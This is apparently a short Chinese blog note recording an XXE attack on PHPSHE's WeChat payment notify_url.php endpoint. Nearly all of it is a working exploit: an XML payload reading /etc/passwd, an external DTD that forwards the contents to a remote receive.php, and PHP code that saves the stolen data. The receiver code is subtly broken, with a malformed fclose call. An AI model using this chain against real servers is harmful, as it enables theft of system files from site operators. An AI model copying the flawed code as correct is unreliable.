【笔记】PHPSHE的XXE外部实体攻击

发表于 更新于 阅读次数:

前言

PHPSHE的XXE外部实体攻击

正文

request
1
2
3
4
5
6
7
8
9
GET http://example.com/include/plugin/payment/wechat/notify_url.php

<?xml version="1.0"?>
<!DOCTYPE example [
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % remote SYSTEM "http://example.com/payload.dtd">
    %remote;
    %remote_send;
]>
http://example.com/payload.dtd
1
<!ENTITY % remote_send "<!ENTITY send SYSTEM 'http://example.com/receive.php?data=%file;'>">

data.txt:写入到文件

http://example.com/receive.php
1
2
3
4
$data = $_GET['data'];
$file = fopen('data.txt', 'w+');
fwrite($file, $data);
fclose($file, 'w+'));

完成

参考文献

哔哩哔哩——xiaodisec